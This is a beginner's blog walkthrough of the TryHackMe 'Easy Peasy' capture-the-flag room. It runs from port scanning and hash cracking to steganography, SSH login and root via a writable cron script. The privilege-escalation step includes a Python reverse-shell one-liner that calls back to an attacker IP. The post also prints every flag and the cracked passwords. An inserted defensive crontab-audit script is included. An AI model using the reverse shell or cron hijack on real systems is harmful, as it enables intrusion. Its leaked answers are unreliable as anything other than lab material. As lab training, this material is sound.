TRYHACKME: EASY PEASY STEP WISE WRITEUP FOR BEGINNERS

noobsixt9
4 min read · Apr 26, 2022

Hello hackers! Today we are going to do another CTF from TryHackMe. This one is Easy Peasy, which was developed by kral4.

Now, let's start our enumeration using nmap.

nmap -sT -sV -p- $thm_ip

Always do a full port scan, or you might miss open ports. Here we have 2 ports open for HTTP and one port for SSH. In total we have 3 ports, which is our first answer. We can see the version of nginx, which is our second answer: 1.61.1. The third question asks what is running on the highest port, and it's Apache.

Now let's check both HTTP services. Hah! Nothing much of interest on the homepage. Time to fuzz web directories; for that I use gobuster. It can be installed from its GitHub repo, and if you are using Kali Linux you can install it with the following commands:

sudo apt update

sudo apt install gobuster

Now let's fuzz on port 80!

gobuster dir -u <thmip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

We found a hidden directory. When we visit that page we see a background image, nothing interesting, so let's keep fuzzing.

gobuster dir -u <thmip>/hidden -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

We see another photo, but when we look at the page source we see hidden text encoded in base64.

<p hidden>ZmxhZ3tmMXJzN19mbDRnfQ==</p>

We can decode this in the terminal with the following command:

root@kali:~/Downloads# echo "ZmxhZ3tmMXJzN19mbDRnfQ==" | base64 -d
flag{f1rs7_fl4g}

That was our first flag. Now let's enumerate our other HTTP service, which is running on port 65524. Going to the Apache server's webpage, it looks like the default Apache page, but when you scroll down you will see flag3.

Fl4g 3 : flag{9fdafbd64c47471a8f54cd3fc64cd312}

After that I ran gobuster against the Apache server and found the following results:

I see a robots.txt file on the web server. robots.txt is how a site communicates with web crawlers, which index your site's data for search engines: it tells the crawlers which directories to crawl and which not to crawl. Let's check it out.

User-Agent:a18672860d0510e5ab6699730763b250

The value of User-Agent looks like a hash. Let's check whether it is using https://hashes.com/en/tools/hash_identifier. Yes, it's an MD5 hash. Now let's crack it. I used the online site https://md5hashing.net/hash/md5/a18672860d0510e5ab6699730763b250, which is great.

flag2: flag{1m_s3c0nd_fl4g}

Now let's check our Apache server's source code; there I see a hidden cipher:

<p hidden>its encoded with ba….:ObsJmP173N2X6dOrAgEAL0Vu</p>

Let's use CyberChef to decode it:

/n0th1ng3ls3m4tt3r

This is our hidden directory and the answer to the hidden directory question. Let's navigate there. Looking at the source code we see a long hash and a JPG image. Let's download the image and copy that hash. I used john with the provided password list easypeasy.txt to crack the hash; you can use online tools, hashcat or john, and you will get the same answer:

Password: mypasswordforthatjob

Let's check whether our JPG image file hides data using steghide. You can install steghide on Kali Linux with the following command:

sudo apt install steghide

Now, let's check our secret text.

cat secerettext.txt

The password is encoded in binary; again we can use CyberChef to decode it.

The decoded username and password are:

boring : iconvertedmypasswordtobinary

SSH? Sure, let's do it.

ssh boring@10.10.29.155 -p6498

Enter the password from above and we have our SSH connection. Let's search for flags.

We saw user.txt in our home directory, and when we open that file it says the data is rotated or something. That might mean it is using a ROT cipher; let's decrypt it using CyberChef. And we got our flag.

user.txt: flag{n0wits33msn0rm4l}

Now, at last, privilege escalation. Let's start with sudo -l; it didn't give us anything. Next, crontabs.

* * * * * root cd /var/www/ && sudo bash .mysecretcronjob.sh

I used locate to find where that script is.

That script is owned by our user, which means we can modify it. Let's put a reverse shell there from pentestmonkey. I used the Python one; you can use bash too, but you have to modify the pentestmonkey Python script a little bit: change your IP and port. Start a listener using netcat and wait for the connection.

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<your_ip>",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
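A defensive check for the misconfiguration this step abuses, added here as an example that is not part of the original write-up: it parses system-crontab lines in the format shown above, resolves the script each root job runs (honouring the leading cd), and flags any file a user other than root could modify. The temp directory and the control job are constructed for the demo; the function names are my own.

```python
import os, re, stat, tempfile

# /etc/crontab and /etc/cron.d format: five schedule fields, a user, a command.
CRON_LINE = re.compile(r"^\s*(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")

def script_paths(cmd, cwd="/"):
    """Candidate file paths in a cron command such as the write-up's
    'cd /var/www/ && sudo bash .mysecretcronjob.sh' (leading cd honoured)."""
    paths = []
    for part in re.split(r"&&|\|\||;", cmd):
        words = part.split()
        if words and words[0] == "cd" and len(words) > 1:
            cwd = words[1]  # later relative names resolve against this dir
            continue
        for w in words:
            if w.startswith("-") or w in {"sudo", "bash", "sh", "python3"}:
                continue
            paths.append(os.path.normpath(os.path.join(cwd, w)))
    return paths

def writable_by_non_root(path):
    """True if a user other than root could edit the file root will execute."""
    try:
        st = os.stat(path)
    except OSError:
        return False  # plain words and missing files are ignored
    return st.st_uid != 0 or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_crontab(text):
    """Scripts run by root jobs that a non-root user could modify."""
    findings = []
    for line in text.splitlines():
        m = CRON_LINE.match(line)
        if not m or line.lstrip().startswith("#") or m.group("user") != "root":
            continue
        findings += [p for p in script_paths(m.group("cmd")) if writable_by_non_root(p)]
    return findings

def demo():
    """Constructed input: the write-up's line with the script moved to a temp
    dir and made world-writable on purpose, plus a harmless control job."""
    tmp = tempfile.mkdtemp()
    script = os.path.join(tmp, ".mysecretcronjob.sh")
    with open(script, "w") as f:
        f.write("#!/bin/bash\necho hi\n")
    os.chmod(script, 0o777)
    crontab = ("SHELL=/bin/sh\n"
               f"* * * * * root cd {tmp} && sudo bash .mysecretcronjob.sh\n"
               "17 * * * * root cd / && run-parts --report /etc/cron.hourly\n")
    return audit_crontab(crontab)
```

Running demo() returns only the writable cron script; the same audit over the real /etc/crontab and /etc/cron.d/* catches the root-runs-user-owned-script pattern before someone else does.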

locate root.txt shows it's hidden in /root/.root.txt.

.root.txt: flag{63a9f0ea7bb98050796b649e85481845}

With that we have successfully completed the Easy Peasy CTF. Thank you everyone for reading; follow me on Twitter if you have any queries or want to do CTFs. noobsixt9.

Keep hacking!!


noobsixt9

Cybersecurity enthusiast, noob programmer and after joining medium probably a writer too HAHAHA